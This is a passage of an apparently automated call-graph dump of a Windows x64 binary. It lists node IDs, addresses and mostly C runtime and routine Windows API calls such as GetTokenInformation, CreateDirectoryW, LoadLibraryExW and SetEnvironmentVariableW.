API calls 16740->16741 16743 7ff69f3f4497 16741->16743 16742 7ff69f3e27df 16742->16681 16743->16742 16744 7ff69f3fdea8 _get_daylight 11 API calls 16743->16744 16747 7ff69f3f44d7 16743->16747 16745 7ff69f3f44cc 16744->16745 16746 7ff69f3f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16745->16746 16746->16747 16747->16742 16890 7ff69f3fdf30 16747->16890 16750 7ff69f3f9c10 _isindst 17 API calls 16751 7ff69f3f451c 16750->16751 16753 7ff69f3f1f6e 16752->16753 16758 7ff69f3f1f5e 16752->16758 16754 7ff69f3f1f77 16753->16754 16762 7ff69f3f1fa5 16753->16762 16755 7ff69f3f9b24 _invalid_parameter_noinfo 37 API calls 16754->16755 16756 7ff69f3f1f9d 16755->16756 16756->16728 16756->16734 16756->16735 16756->16736 16757 7ff69f3f9b24 _invalid_parameter_noinfo 37 API calls 16757->16756 16758->16757 16759 7ff69f3f3ae0 45 API calls 16759->16762 16761 7ff69f3f2254 16764 7ff69f3f9b24 _invalid_parameter_noinfo 37 API calls 16761->16764 16762->16756 16762->16758 16762->16759 16762->16761 16766 7ff69f3f28c0 16762->16766 16792 7ff69f3f2588 16762->16792 16822 7ff69f3f1e10 16762->16822 16764->16758 16767 7ff69f3f2975 16766->16767 16768 7ff69f3f2902 16766->16768 16771 7ff69f3f29cf 16767->16771 16772 7ff69f3f297a 16767->16772 16769 7ff69f3f299f 16768->16769 16770 7ff69f3f2908 16768->16770 16839 7ff69f3f0e70 16769->16839 16777 7ff69f3f290d 16770->16777 16780 7ff69f3f29de 16770->16780 16771->16769 16771->16780 16790 7ff69f3f2938 16771->16790 16773 7ff69f3f29af 16772->16773 16774 7ff69f3f297c 16772->16774 16846 7ff69f3f0a60 16773->16846 16779 7ff69f3f298b 16774->16779 16784 7ff69f3f291d 16774->16784 16781 7ff69f3f2950 16777->16781 16777->16784 16777->16790 16779->16769 16785 7ff69f3f2990 16779->16785 16791 7ff69f3f2a0d 16780->16791 16853 7ff69f3f1280 16780->16853 16781->16791 16835 7ff69f3f36e0 16781->16835 16784->16791 16825 7ff69f3f3224 16784->16825 16787 7ff69f3f3878 37 API calls 16785->16787 16785->16791 16786 7ff69f3eb870 _log10_special 8 API calls 16788 7ff69f3f2ca3 16786->16788 16787->16790 16788->16762 16790->16791 16860 7ff69f3fdb68 16790->16860 16791->16786 16793 7ff69f3f2593 16792->16793 16794 7ff69f3f25a9 16792->16794 16796 7ff69f3f25e7 16793->16796 16797 7ff69f3f2975 16793->16797 16798 7ff69f3f2902 16793->16798 16795 7ff69f3f9b24 _invalid_parameter_noinfo 37 API calls 16794->16795 16794->16796 16795->16796 16796->16762 16801 7ff69f3f29cf 16797->16801 16802 7ff69f3f297a 16797->16802 16799 7ff69f3f299f 16798->16799 16800 7ff69f3f2908 16798->16800 16805 7ff69f3f0e70 38 API calls 16799->16805 16809 7ff69f3f290d 16800->16809 16812 7ff69f3f29de 16800->16812 16801->16799 16801->16812 16819 7ff69f3f2938 16801->16819 16803 7ff69f3f29af 16802->16803 16804 7ff69f3f297c 16802->16804 16807 7ff69f3f0a60 38 API calls 16803->16807 16806 7ff69f3f291d 16804->16806 16810 7ff69f3f298b 16804->16810 16805->16819 16808 7ff69f3f3224 47 API calls 16806->16808 16821 7ff69f3f2a0d 16806->16821 16807->16819 16808->16819 16809->16806 16811 7ff69f3f2950 16809->16811 16809->16819 16810->16799 16814 7ff69f3f2990 16810->16814 16815 7ff69f3f36e0 47 API calls 16811->16815 16811->16821 16813 7ff69f3f1280 38 API calls 16812->16813 16812->16821 16813->16819 16817 7ff69f3f3878 37 API calls 16814->16817 16814->16821 16815->16819 16816 7ff69f3eb870 _log10_special 8 API calls 16818 7ff69f3f2ca3 16816->16818 16817->16819 16818->16762 16820 7ff69f3fdb68 47 API calls 16819->16820 16819->16821 16820->16819 16821->16816 16873 7ff69f3f0034 16822->16873 16826 7ff69f3f3246 16825->16826 16827 7ff69f3efea0 12 API calls 16826->16827 16828 7ff69f3f328e 16827->16828 16829 7ff69f3fd880 46 API calls 16828->16829 16830 7ff69f3f3361 16829->16830 16831 7ff69f3f3ae0 45 API calls 16830->16831 16834 7ff69f3f3383 16830->16834 16831->16834 16832 7ff69f3f340c 16832->16790 16832->16832 16833 7ff69f3f3ae0 45 API calls 16833->16832 16834->16832 16834->16833 16834->16834 16836 7ff69f3f36f8 16835->16836 16838 7ff69f3f3760 16835->16838 16837 7ff69f3fdb68 47 API calls 16836->16837 16836->16838 16837->16838 16838->16790 16840 7ff69f3f0ea3 16839->16840 16841 7ff69f3f0ed2 16840->16841 16843 7ff69f3f0f8f 16840->16843 16842 7ff69f3efea0 12 API calls 16841->16842 16845 7ff69f3f0f0f 16841->16845 16842->16845 16844 7ff69f3f9b24 _invalid_parameter_noinfo 37 API calls 16843->16844 16844->16845 16845->16790 16847 7ff69f3f0a93 16846->16847 16848 7ff69f3f0ac2 16847->16848 16850 7ff69f3f0b7f 16847->16850 16849 7ff69f3efea0 12 API calls 16848->16849 16852 7ff69f3f0aff 16848->16852 16849->16852 16851 7ff69f3f9b24 _invalid_parameter_noinfo 37 API calls 16850->16851 16851->16852 16852->16790 16855 7ff69f3f12b3 16853->16855 16854 7ff69f3f12e2 16856 7ff69f3efea0 12 API calls 16854->16856 16859 7ff69f3f131f 16854->16859 16855->16854 16857 7ff69f3f139f 16855->16857 16856->16859 16858 7ff69f3f9b24 _invalid_parameter_noinfo 37 API calls 16857->16858 16858->16859 16859->16790 16861 7ff69f3fdb90 16860->16861 16862 7ff69f3fdbd5 16861->16862 16864 7ff69f3f3ae0 45 API calls 16861->16864 16865 7ff69f3fdb95 __scrt_get_show_window_mode 16861->16865 16866 7ff69f3fdbbe __scrt_get_show_window_mode 16861->16866 16862->16865 16862->16866 16870 7ff69f3ffaf8 16862->16870 16863 7ff69f3f9b24 _invalid_parameter_noinfo 37 API calls 16863->16865 16864->16862 16865->16790 16866->16863 16866->16865 16872 7ff69f3ffb1c WideCharToMultiByte 16870->16872 16874 7ff69f3f0073 16873->16874 16875 7ff69f3f0061 16873->16875 16877 7ff69f3f0080 16874->16877 16881 7ff69f3f00bd 16874->16881 16876 7ff69f3f43f4 _get_daylight 11 API calls 16875->16876 16878 7ff69f3f0066 16876->16878 16879 7ff69f3f9b24 _invalid_parameter_noinfo 37 API calls 16877->16879 16880 7ff69f3f9bf0 _invalid_parameter_noinfo 37 API calls 16878->16880 16885 7ff69f3f0071 16879->16885 16880->16885 16882 7ff69f3f0166 16881->16882 16883 7ff69f3f43f4 _get_daylight 11 API calls 16881->16883 16884 7ff69f3f43f4 _get_daylight 11 API calls 16882->16884 16882->16885 16886 7ff69f3f015b 16883->16886 16887 7ff69f3f0210 16884->16887 16885->16762 16888 7ff69f3f9bf0 _invalid_parameter_noinfo 37 API calls 16886->16888 16889 7ff69f3f9bf0 _invalid_parameter_noinfo 37 API calls 16887->16889 16888->16882 16889->16885 16895 7ff69f3fdf4d 16890->16895 16891 7ff69f3fdf52 16892 7ff69f3f44fd 16891->16892 16893 7ff69f3f43f4 _get_daylight 11 API calls 16891->16893 16892->16742 16892->16750 16894 7ff69f3fdf5c 16893->16894 16896 7ff69f3f9bf0 _invalid_parameter_noinfo 37 API calls 16894->16896 16895->16891 16895->16892 16897 7ff69f3fdf9c 16895->16897 16896->16892 16897->16892 16898 7ff69f3f43f4 _get_daylight 11 API calls 16897->16898 16898->16894 16900 7ff69f3f7555 16899->16900 16901 7ff69f3f7568 16899->16901 16902 7ff69f3f43f4 _get_daylight 11 API calls 16900->16902 16909 7ff69f3f71cc 16901->16909 16904 7ff69f3f755a 16902->16904 16906 7ff69f3f9bf0 _invalid_parameter_noinfo 37 API calls 16904->16906 16907 7ff69f3f7566 16906->16907 16907->15968 16916 7ff69f3ff5e8 EnterCriticalSection 16909->16916 16918 7ff69f3e7b91 GetTokenInformation 16917->16918 16921 7ff69f3e7c13 __std_exception_destroy 16917->16921 16919 7ff69f3e7bb2 GetLastError 16918->16919 16920 7ff69f3e7bbd 16918->16920 16919->16920 16919->16921 16920->16921 16924 7ff69f3e7bd9 GetTokenInformation 16920->16924 16922 7ff69f3e7c2c 16921->16922 16923 7ff69f3e7c26 CloseHandle 16921->16923 16922->15977 16923->16922 16924->16921 16925 7ff69f3e7bfc 16924->16925 16925->16921 16926 7ff69f3e7c06 ConvertSidToStringSidW 16925->16926 16926->16921 16928 7ff69f3e297a 16927->16928 17212 7ff69f3e3f70 108 API calls 17211->17212 17213 7ff69f3e1463 17212->17213 17214 7ff69f3e146b 17213->17214 17215 7ff69f3e148c 17213->17215 17216 7ff69f3e25f0 53 API calls 17214->17216 17217 7ff69f3ef9f4 73 API calls 17215->17217 17218 7ff69f3e147b 17216->17218 17219 7ff69f3e14a1 17217->17219 17218->16036 17220 7ff69f3e14a5 17219->17220 17221 7ff69f3e14c1 17219->17221 17222 7ff69f3e2760 53 API calls 17220->17222 17223 7ff69f3e14f1 17221->17223 17224 7ff69f3e14d1 17221->17224 17230 7ff69f3e14bc __std_exception_destroy 17222->17230 17226 7ff69f3e14f7 17223->17226 17232 7ff69f3e150a 17223->17232 17227 7ff69f3e2760 53 API calls 17224->17227 17225 7ff69f3ef36c 74 API calls 17228 7ff69f3e1584 17225->17228 17235 7ff69f3e11f0 17226->17235 17227->17230 17228->16036 17230->17225 17231 7ff69f3ef6bc _fread_nolock 53 API calls 17231->17232 17232->17230 17232->17231 17233 7ff69f3e1596 17232->17233 17234 7ff69f3e2760 53 API calls 17233->17234 17234->17230 17236 7ff69f3e1248 17235->17236 17237 7ff69f3e124f 17236->17237 17238 7ff69f3e1277 17236->17238 17239 7ff69f3e25f0 53 API calls 17237->17239 17241 7ff69f3e1291 17238->17241 17242 7ff69f3e12ad 17238->17242 17240 7ff69f3e1262 17239->17240 17240->17230 17243 7ff69f3e2760 53 API calls 17241->17243 17244 7ff69f3e12bf 17242->17244 17251 7ff69f3e12db memcpy_s 17242->17251 17247 7ff69f3e12a8 __std_exception_destroy 17243->17247 17245 7ff69f3e2760 53 API calls 17244->17245 17245->17247 17246 7ff69f3ef6bc _fread_nolock 53 API calls 17246->17251 17247->17230 17248 7ff69f3e139f 17251->17246 17251->17247 17251->17248 17252 7ff69f3ef430 37 API calls 17251->17252 17253 7ff69f3efdfc 17251->17253 17252->17251 17273 7ff69f3e3f1a 17272->17273 17274 7ff69f3e86b0 2 API calls 17273->17274 17275 7ff69f3e3f3f 17274->17275 17276 7ff69f3eb870 _log10_special 8 API calls 17275->17276 17277 7ff69f3e3f67 17276->17277 17277->16060 17279 7ff69f3e753e 17278->17279 17280 7ff69f3e1bf0 49 API calls 17279->17280 17281 7ff69f3e7662 17279->17281 17287 7ff69f3e75c5 17280->17287 17282 7ff69f3eb870 _log10_special 8 API calls 17281->17282 17283 7ff69f3e7693 17282->17283 17283->16060 17284 7ff69f3e1bf0 49 API calls 17284->17287 17285 7ff69f3e3f10 10 API calls 17285->17287 17286 7ff69f3e761b 17288 7ff69f3e86b0 2 API calls 17286->17288 17287->17281 17287->17284 17287->17285 17287->17286 17289 7ff69f3e7633 CreateDirectoryW 17288->17289 17289->17281 17289->17287 17291 7ff69f3e15d3 17290->17291 17292 7ff69f3e15f7 17290->17292 17379 7ff69f3e1050 17291->17379 17294 7ff69f3e3f70 108 API calls 17292->17294 17296 7ff69f3e160b 17294->17296 17295 7ff69f3e15d8 17297 7ff69f3e15ee 17295->17297 17302 7ff69f3e25f0 53 API calls 17295->17302 17298 7ff69f3e1613 17296->17298 17299 7ff69f3e163b 17296->17299 17297->16060 17300 7ff69f3e2760 53 API calls 17298->17300 17301 7ff69f3e3f70 108 API calls 17299->17301 17303 7ff69f3e162a 17300->17303 17304 7ff69f3e164f 17301->17304 17302->17297 17303->16060 17305 7ff69f3e1671 17304->17305 17306 7ff69f3e1657 17304->17306 17308 7ff69f3ef9f4 73 API calls 17305->17308 17307 7ff69f3e25f0 53 API calls 17306->17307 17309 7ff69f3e1667 17307->17309 17310 7ff69f3e1686 17308->17310 17329 7ff69f3e694b 17328->17329 17331 7ff69f3e6904 17328->17331 17329->16060 17331->17329 17418 7ff69f3f4250 17331->17418 17333 7ff69f3e3b51 17332->17333 17334 7ff69f3e3e90 49 API calls 17333->17334 17335 7ff69f3e3b8b 17334->17335 17336 7ff69f3e3e90 49 API calls 17335->17336 17337 7ff69f3e3b9b 17336->17337 17338 7ff69f3e3bbd 17337->17338 17339 7ff69f3e3bec 17337->17339 17449 7ff69f3e3ac0 17338->17449 17341 7ff69f3e3ac0 51 API calls 17339->17341 17342 7ff69f3e3bea 17341->17342 17377 7ff69f3e1bf0 49 API calls 17376->17377 17378 7ff69f3e3e24 17377->17378 17378->16060 17380 7ff69f3e3f70 108 API calls 17379->17380 17381 7ff69f3e108b 17380->17381 17382 7ff69f3e1093 17381->17382 17383 7ff69f3e10a8 17381->17383 17384 7ff69f3e25f0 53 API calls 17382->17384 17385 7ff69f3ef9f4 73 API calls 17383->17385 17390 7ff69f3e10a3 __std_exception_destroy 17384->17390 17386 7ff69f3e10bd 17385->17386 17387 7ff69f3e10c1 17386->17387 17388 7ff69f3e10dd 17386->17388 17390->17295 17419 7ff69f3f425d 17418->17419 17420 7ff69f3f428a 17418->17420 17421 7ff69f3f43f4 _get_daylight 11 API calls 17419->17421 17422 7ff69f3f4214 17419->17422 17423 7ff69f3f42ad 17420->17423 17424 7ff69f3f42c9 17420->17424 17425 7ff69f3f4267 17421->17425 17422->17331 17426 7ff69f3f43f4 _get_daylight 11 API calls 17423->17426 17433 7ff69f3f4178 17424->17433 17428 7ff69f3f9bf0 _invalid_parameter_noinfo 37 API calls 17425->17428 17429 7ff69f3f42b2 17426->17429 17430 7ff69f3f4272 17428->17430 17431 7ff69f3f9bf0 _invalid_parameter_noinfo 37 API calls 17429->17431 17430->17331 17432 7ff69f3f42bd 17431->17432 17432->17331 17434 7ff69f3f419c 17433->17434 17435 7ff69f3f4197 17433->17435 17434->17435 17436 7ff69f3fa460 __CxxCallCatchBlock 45 API calls 17434->17436 17435->17432 17437 7ff69f3f41b7 17436->17437 17441 7ff69f3fcc94 17437->17441 17450 7ff69f3e3ae6 17449->17450 17513 7ff69f3ebe12 RtlLookupFunctionEntry 17512->17513 17514 7ff69f3ebc2b 17513->17514 17515 7ff69f3ebe28 RtlVirtualUnwind 17513->17515 17516 7ff69f3ebbc0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 17514->17516 17515->17513 17515->17514 17518 7ff69f3f51d8 17517->17518 17519 7ff69f3f51fe 17518->17519 17522 7ff69f3f5231 17518->17522 17520 7ff69f3f43f4 _get_daylight 11 API calls 17519->17520 17521 7ff69f3f5203 17520->17521 17523 7ff69f3f9bf0 _invalid_parameter_noinfo 37 API calls 17521->17523 17524 7ff69f3f5244 17522->17524 17525 7ff69f3f5237 17522->17525 17529 7ff69f3e3fc6 17523->17529 17536 7ff69f3f9f38 17524->17536 17526 7ff69f3f43f4 _get_daylight 11 API calls 17525->17526 17526->17529 17529->16097 17549 7ff69f3ff5e8 EnterCriticalSection 17536->17549 17909 7ff69f3f6c08 17908->17909 17912 7ff69f3f66e4 17909->17912 17911 7ff69f3f6c21 17911->16107 17913 7ff69f3f672e 17912->17913 17914 7ff69f3f66ff 17912->17914 17922 7ff69f3f477c EnterCriticalSection 17913->17922 17915 7ff69f3f9b24 _invalid_parameter_noinfo 37 API calls 17914->17915 17917 7ff69f3f671f 17915->17917 17917->17911 17924 7ff69f3ef163 17923->17924 17925 7ff69f3ef191 17923->17925 17926 7ff69f3f9b24 _invalid_parameter_noinfo 37 API calls 17924->17926 17927 7ff69f3ef183 17925->17927 17933 7ff69f3f477c EnterCriticalSection 17925->17933 17926->17927 17927->16111 17935 7ff69f3e86b0 2 API calls 17934->17935 17936 7ff69f3e81b4 LoadLibraryExW 17935->17936 17937 7ff69f3e81d3 __std_exception_destroy 17936->17937 17937->16141 17939 7ff69f3e6ef3 GetProcAddress 17938->17939 17945 7ff69f3e6ec9 17938->17945 17940 7ff69f3e6f18 GetProcAddress 17939->17940 17939->17945 17941 7ff69f3e6f3d GetProcAddress 17940->17941 17940->17945 17941->17945 17942 7ff69f3e29e0 51 API calls 17943 7ff69f3e6ee3 17942->17943 17943->16148 17945->17942 18004 7ff69f3e5b05 18003->18004 18005 7ff69f3e1bf0 49 API calls 18004->18005 18006 7ff69f3e5b41 18005->18006 18007 7ff69f3e5b4a 18006->18007 18008 7ff69f3e5b6d 18006->18008 18009 7ff69f3e25f0 53 API calls 18007->18009 18010 7ff69f3e3fe0 49 API calls 18008->18010 18033 7ff69f3e5b63 18009->18033 18011 7ff69f3e5b85 18010->18011 18012 7ff69f3e5ba3 18011->18012 18014 7ff69f3e25f0 53 API calls 18011->18014 18015 7ff69f3e3f10 10 API calls 18012->18015 18013 7ff69f3eb870 _log10_special 8 API calls 18016 7ff69f3e308e 18013->18016 18014->18012 18017 7ff69f3e5bad 18015->18017 18016->16181 18034 7ff69f3e5c80 18016->18034 18018 7ff69f3e5bbb 18017->18018 18019 7ff69f3e81a0 3 API calls 18017->18019 18020 7ff69f3e3fe0 49 API calls 18018->18020 18019->18018 18021 7ff69f3e5bd4 18020->18021 18022 7ff69f3e5bf9 18021->18022 18023 7ff69f3e5bd9 18021->18023 18025 7ff69f3e81a0 3 API calls 18022->18025 18024 7ff69f3e25f0 53 API calls 18023->18024 18024->18033 18026 7ff69f3e5c06 18025->18026 18033->18013 18173 7ff69f3e4c80 18034->18173 18036 7ff69f3e5cba 18037 7ff69f3e5cd3 18036->18037 18038 7ff69f3e5cc2 18036->18038 18180 7ff69f3e4450 18037->18180 18039 7ff69f3e25f0 53 API calls 18038->18039 18175 7ff69f3e4cac 18173->18175 18174 7ff69f3e4cb4 18174->18036 18175->18174 18178 7ff69f3e4e54 18175->18178 18211 7ff69f3f5db4 18175->18211 18176 7ff69f3e5017 __std_exception_destroy 18176->18036 18177 7ff69f3e4180 47 API calls 18177->18178 18178->18176 18178->18177 18181 7ff69f3e4480 18180->18181 18212 7ff69f3f5de4 18211->18212 18215 7ff69f3f52b0 18212->18215 18216 7ff69f3f52f3 18215->18216 18217 7ff69f3f52e1 18215->18217 18219 7ff69f3f533d 18216->18219 18291->16185 18293 7ff69f3fa460 __CxxCallCatchBlock 45 API calls 18292->18293 18294 7ff69f3f96f1 18293->18294 18297 7ff69f3f9814 18294->18297 18306 7ff69f402960 18297->18306 18332 7ff69f402918 18306->18332 18337 7ff69f3ff5e8 EnterCriticalSection 18332->18337 18507 7ff69f3ffbd8 18508 7ff69f3ffbfc 18507->18508 18510 7ff69f3ffc0c 18507->18510 18509 7ff69f3f43f4 _get_daylight 11 API calls 18508->18509 18532 7ff69f3ffc01 18509->18532 18511 7ff69f3ffeec 18510->18511 18512 7ff69f3ffc2e 18510->18512 18513 7ff69f3f43f4 _get_daylight 11 API calls 18511->18513 18514 7ff69f3ffc4f 18512->18514 18647 7ff69f400294 18512->18647 18515 7ff69f3ffef1 18513->18515 18518 7ff69f3ffcc1 18514->18518 18519 7ff69f3ffc75 18514->18519 18524 7ff69f3ffcb5 18514->18524 18517 7ff69f3f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18515->18517 18517->18532 18521 7ff69f3fdea8 _get_daylight 11 API calls 18518->18521 18536 7ff69f3ffc84 18518->18536 18662 7ff69f3f89d8 18519->18662 18520 7ff69f3ffd6e 18531 7ff69f3ffd8b 18520->18531 18537 7ff69f3ffddd 18520->18537 18525 7ff69f3ffcd7 18521->18525 18524->18520 18524->18536 18668 7ff69f40643c 18524->18668 18528 7ff69f3f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18525->18528 18527 7ff69f3f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18527->18532 18533 7ff69f3ffce5 18528->18533 18529 7ff69f3ffc7f 18534 7ff69f3f43f4 _get_daylight 11 API calls 18529->18534 18530 7ff69f3ffc9d 18530->18524 18539 7ff69f400294 45 API calls 18530->18539 18535 7ff69f3f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18531->18535 18533->18524 18533->18536 18541 7ff69f3fdea8 _get_daylight 11 API calls 18533->18541 18534->18536 18538 7ff69f3ffd94 18535->18538 18536->18527 18537->18536 18540 7ff69f4026ec 40 API calls 18537->18540 18545 7ff69f4026ec 40 API calls 18538->18545 18547 7ff69f3ffd99 18538->18547 18539->18524 18542 7ff69f3ffe1a 18540->18542 18543 7ff69f3ffd07 18541->18543 18544 7ff69f3f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18542->18544 18549 7ff69f3f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18543->18549 18550 7ff69f3ffe24 18544->18550 18548 7ff69f3ffdc5 18545->18548 18546 7ff69f3ffee0 18552 7ff69f3f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18546->18552 18547->18546 18553 7ff69f3fdea8 _get_daylight 11 API calls 18547->18553 18551 7ff69f3f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18548->18551 18549->18524 18550->18536 18550->18547 18551->18547 18552->18532 18554 7ff69f3ffe68 18553->18554 18555 7ff69f3ffe70 18554->18555 18556 7ff69f3ffe79 18554->18556 18557 7ff69f3f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18555->18557 18558 7ff69f3f97b4 __std_exception_copy 37 API calls 18556->18558 18559 7ff69f3ffe77 18557->18559 18560 7ff69f3ffe88 18558->18560 18564 7ff69f3f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18559->18564 18561 7ff69f3ffe90 18560->18561 18562 7ff69f3fff1b 18560->18562 18704 7ff69f406554 18561->18704 18563 7ff69f3f9c10 _isindst 17 API calls 18562->18563 18566 7ff69f3fff2f 18563->18566 18564->18532 18568 7ff69f3fff58 18566->18568 18577 7ff69f3fff68 18566->18577 18571 7ff69f3f43f4 _get_daylight 11 API calls 18568->18571 18569 7ff69f3ffed8 18572 7ff69f3f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18569->18572 18570 7ff69f3ffeb7 18573 7ff69f3f43f4 _get_daylight 11 API calls 18570->18573 18575 7ff69f3fff5d 18571->18575 18572->18546 18574 7ff69f3ffebc 18573->18574 18576 7ff69f3f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18574->18576 18576->18559 18578 7ff69f40024b 18577->18578 18579 7ff69f3fff8a 18577->18579 18580 7ff69f3f43f4 _get_daylight 11 API calls 18578->18580 18581 7ff69f3fffa7 18579->18581 18723 7ff69f40037c 18579->18723 18582 7ff69f400250 18580->18582 18585 7ff69f40001b 18581->18585 18587 7ff69f3fffcf 18581->18587 18591 7ff69f40000f 18581->18591 18584 7ff69f3f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18582->18584 18584->18575 18589 7ff69f400043 18585->18589 18592 7ff69f3fdea8 _get_daylight 11 API calls 18585->18592 18605 7ff69f3fffde 18585->18605 18586 7ff69f4000ce 18600 7ff69f4000eb 18586->18600 18606 7ff69f40013e 18586->18606 18738 7ff69f3f8a14 18587->18738 18589->18591 18594 7ff69f3fdea8 _get_daylight 11 API calls 18589->18594 18589->18605 18591->18586 18591->18605 18744 7ff69f4062fc 18591->18744 18596 7ff69f400035 18592->18596 18599 7ff69f400065 18594->18599 18595 7ff69f3f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18595->18575 18601 7ff69f3f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18596->18601 18597 7ff69f3fffd9 18602 7ff69f3f43f4 _get_daylight 11 API calls 18597->18602 18598 7ff69f3ffff7 18598->18591 18608 7ff69f40037c 45 API calls 18598->18608 18603 7ff69f3f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18599->18603 18604 7ff69f3f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18600->18604 18601->18589 18602->18605 18603->18591 18607 7ff69f4000f4 18604->18607 18605->18595 18606->18605 18638 7ff69f4026ec 18606->18638 18611 7ff69f4026ec 40 API calls 18607->18611 18615 7ff69f4000fa 18607->18615 18608->18591 18610 7ff69f40017c 18612 7ff69f3f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18610->18612 18613 7ff69f400126 18611->18613 18616 7ff69f400186 18612->18616 18617 7ff69f3f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18613->18617 18614 7ff69f40023f 18618 7ff69f3f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18614->18618 18615->18614 18619 7ff69f3fdea8 _get_daylight 11 API calls 18615->18619 18616->18605 18616->18615 18617->18615 18618->18575 18620 7ff69f4001cb 18619->18620 18621 7ff69f4001d3 18620->18621 18622 7ff69f4001dc 18620->18622 18623 7ff69f3f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18621->18623 18624 7ff69f3ff784 37 API calls 18622->18624 18625 7ff69f4001da 18623->18625 18626 7ff69f4001ea 18624->18626 18630 7ff69f3f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18625->18630 18627 7ff69f4001f2 SetEnvironmentVariableW 18626->18627 18628 7ff69f40027f 18626->18628 18631 7ff69f400237 18627->18631 18632 7ff69f400216 18627->18632 18629 7ff69f3f9c10 _isindst 17 API calls 18628->18629 18633 7ff69f400293 18629->18633 18630->18575 18634 7ff69f3f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18631->18634 18635 7ff69f3f43f4 _get_daylight 11 API calls 18632->18635 18634->18614 18636 7ff69f40021b 18635->18636 18637 7ff69f3f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18636->18637 18637->18625 18639 7ff69f40270e 18638->18639 18640 7ff69f40272b 18638->18640 18639->18640 18641 7ff69f40271c 18639->18641 18642 7ff69f402735 18640->18642 18780 7ff69f406f48 18640->18780 18644 7ff69f3f43f4 _get_daylight 11 API calls 18641->18644 18768 7ff69f406f84 18642->18768 18646 7ff69f402721 __scrt_get_show_window_mode 18644->18646 18646->18610 18648 7ff69f4002c9 18647->18648 18654 7ff69f4002b1 18647->18654 18649 7ff69f3fdea8 _get_daylight 11 API calls 18648->18649 18657 7ff69f4002ed 18649->18657 18650 7ff69f40034e 18652 7ff69f3f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18650->18652 18651 7ff69f3f9814 __CxxCallCatchBlock 45 API calls 18653 7ff69f400378 18651->18653 18652->18654 18654->18514 18655 7ff69f3fdea8 _get_daylight 11 API calls 18655->18657 18656 7ff69f3f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18656->18657 18657->18650 18657->18655 18657->18656 18658 7ff69f3f97b4 __std_exception_copy 37 API calls 18657->18658 18659 7ff69f40035d 18657->18659 18661 7ff69f400372 18657->18661 18658->18657 18660 7ff69f3f9c10 _isindst 17 API calls 18659->18660 18660->18661 18661->18651 18663 7ff69f3f89f1 18662->18663 18664 7ff69f3f89e8 18662->18664 18663->18529 18663->18530 18664->18663 18787 7ff69f3f84b0 18664->18787 18669 7ff69f405564 18668->18669 18670 7ff69f406449 18668->18670 18671 7ff69f405571 18669->18671 18678 7ff69f4055a7 18669->18678 18672 7ff69f3f4178 45 API calls 18670->18672 18675 7ff69f3f43f4 _get_daylight 11 API calls 18671->18675 18691 7ff69f405518 18671->18691 18674 7ff69f40647d 18672->18674 18673 7ff69f4055d1 18676 7ff69f3f43f4 _get_daylight 11 API calls 18673->18676 18677 7ff69f406482 18674->18677 18681 7ff69f406493 18674->18681 18685 7ff69f4064aa 18674->18685 18679 7ff69f40557b 18675->18679 18680 7ff69f4055d6 18676->18680 18677->18524 18678->18673 18682 7ff69f4055f6 18678->18682 18683 7ff69f3f9bf0 _invalid_parameter_noinfo 37 API calls 18679->18683 18684 7ff69f3f9bf0 _invalid_parameter_noinfo 37 API calls 18680->18684 18686 7ff69f3f43f4 _get_daylight 11 API calls 18681->18686 18688 7ff69f3f4178 45 API calls 18682->18688 18693 7ff69f4055e1 18682->18693 18687 7ff69f405586 18683->18687 18684->18693 18689 7ff69f4064b4 18685->18689 18690 7ff69f4064c6 18685->18690 18692 7ff69f406498 18686->18692 18687->18524 18688->18693 18694 7ff69f3f43f4 _get_daylight 11 API calls 18689->18694 18695 7ff69f4064ee 18690->18695 18696 7ff69f4064d7 18690->18696 18691->18524 18697 7ff69f3f9bf0 _invalid_parameter_noinfo 37 API calls 18692->18697 18693->18524 18698 7ff69f4064b9 18694->18698 19019 7ff69f40825c 18695->19019 19010 7ff69f4055b4 18696->19010 18697->18677 18701 7ff69f3f9bf0 _invalid_parameter_noinfo 37 API calls 18698->18701 18701->18677 18703 7ff69f3f43f4 _get_daylight 11 API calls 18703->18677 18705 7ff69f3f4178 45 API calls 18704->18705 18706 7ff69f4065ba 18705->18706 18708 7ff69f4065c8 18706->18708 19059 7ff69f3fe234 18706->19059 19062 7ff69f3f47bc 18708->19062 18711 7ff69f4066b4 18714 7ff69f4066c5 18711->18714 18715 7ff69f3f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18711->18715 18712 7ff69f3f4178 45 API calls 18713 7ff69f406637 18712->18713 18717 7ff69f3fe234 5 API calls 18713->18717 18722 7ff69f406640 18713->18722 18716 7ff69f3ffeb3 18714->18716 18718 7ff69f3f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18714->18718 18715->18714 18716->18569 18716->18570 18717->18722 18718->18716 18719 7ff69f3f47bc 14 API calls 18720 7ff69f40669b 18719->18720 18720->18711 18721 7ff69f4066a3 SetEnvironmentVariableW 